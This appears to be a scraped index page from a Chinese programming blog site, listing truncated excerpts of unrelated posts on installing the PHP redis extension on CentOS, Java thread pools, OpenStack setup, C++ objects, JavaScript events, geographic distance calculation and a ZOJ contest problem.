centos下php redis扩展的安装配置3种方法 dcj3sjt126com redis
方法一 1.下载php redis扩展包代码如下复制代码 #wget http://redis.googlecode.com/files/redis-2.4.4.tar.gz 2 tar -zxvf 解压压缩包，cd /扩展包（进入扩展包然后运行phpize 一下是我环境中phpize的目录，/usr/local/php/bin/phpize (一定要
线程池(Executors) shuizhaosi888 线程池
在java类库中，任务执行的主要抽象不是Thread，而是Executor，将任务的提交过程和执行过程解耦 public interface Executor { void execute(Runnable command); } public class RunMain implements Executor{ @Override pub
openstack 快速安装笔记 haoningabc openstack
前提是要配置好yum源版本icehouse，操作系统redhat6.5 最简化安装，不要cinder和swift 三个节点 172 control节点keystone glance horizon 173 compute节点nova 173 network节点neutron control /etc/sysctl.conf net.ipv4.ip_forward =
从c面向对象的实现理解c++的对象（二） jimmee C++面向对象虚函数
1. 类就可以看作一个struct，类的方法，可以理解为通过函数指针的方式实现的，类对象分配内存时，只分配成员变量的，函数指针并不需要分配额外的内存保存地址。 2. c++中类的构造函数，就是进行内存分配(malloc)，调用构造函数 3. c++中类的析构函数，就时回收内存(free) 4. c++是基于栈和全局数据分配内存的，如果是一个方法内创建的对象，就直接在栈上分配内存了。专门在
如何让那个一个div可以拖动 lingfeng520240 html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml
第10章高级事件（中） onestopweb 事件
index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
计算两个经纬度之间的距离 roadrunners 计算纬度 LBS 经度距离
要解决这个问题的时候，到网上查了很多方案，最后计算出来的都与百度计算出来的有出入。下面这个公式计算出来的距离和百度计算出来的距离是一致的。 /** * * @param longitudeA * 经度A点 * @param latitudeA * 纬度A点 * @param longitudeB *
最具争议的10个Java话题 tomcat_oracle java
1、Java8已经到来。什么！？ Java8 支持lambda。哇哦，RIP Scala！　　随着Java8 的发布，出现很多关于新发布的Java8是否有潜力干掉Scala的争论，最终的结论是远远没有那么简单。Java8可能已经在Scala的lambda的包围中突围，但Java并非是函数式编程王位的真正觊觎者。　　2、Java 9 即将到来　　 Oracle早在8月份就发布
zoj 3826 Hierarchical Notation(模拟) 阿尔萨斯 rar
题目链接：zoj 3826 Hierarchical Notation 题目大意：给定一些结构体，结构体有value值和key值，Q次询问，输出每个key值对应的value值。解题思路：思路很简单，写个类词法的递归函数，每次将key值映射成一个hash值，用map映射每个key的value起始终止位置，预处理完了查询就很简单了。这题是最后10分钟出的，因为没有考虑value为{}的情